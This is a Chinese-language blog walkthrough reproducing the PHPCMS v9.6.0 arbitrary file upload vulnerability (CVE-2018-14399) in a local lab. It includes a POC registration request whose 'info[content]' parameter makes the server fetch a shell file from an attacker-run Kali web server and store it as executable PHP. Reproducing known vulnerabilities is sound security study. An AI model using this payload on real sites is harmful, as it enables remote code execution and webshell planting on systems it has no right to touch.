phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)

一,下载安装phpcmsv966.0

1,下载官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装

16089a64f0387a5a3d36e7826a060352.png

2,打开后台管理,进入后台,后台账号密码为之前安装时候设置的账号密码

e79f380fd73b5a67d772f2e3e3946360.png

a9bee4e60943f74719a9ef49f82831a7.png

二、漏洞复现

1,查询资料可知,任意文件上传漏洞出现在,PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。

2,漏洞利用,在phpcms注册界面,填写信息进行抓包

3fa934f53e591f8c7c446c02661cba7c.png

3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息

vim shell.txt

7a32472091772dabac5e01ca043646e3.png

4. 构造POC

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=shell.txt?.php#.jpg&dosubmit=1&protocol=

65305febd4074de7443b1bb57a0ffd26.png

5,访问得到的上传路径,可以看到脚本正常执行

7e0d824c2744dbad94814f952a42edc8.png

64840b38ecfae5c7395cd176886d3b16.png

标签:11,文件,漏洞,v9.6,phpcms,后台,上传,下载

来源: https://www.cnblogs.com/sym945/p/11825504.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值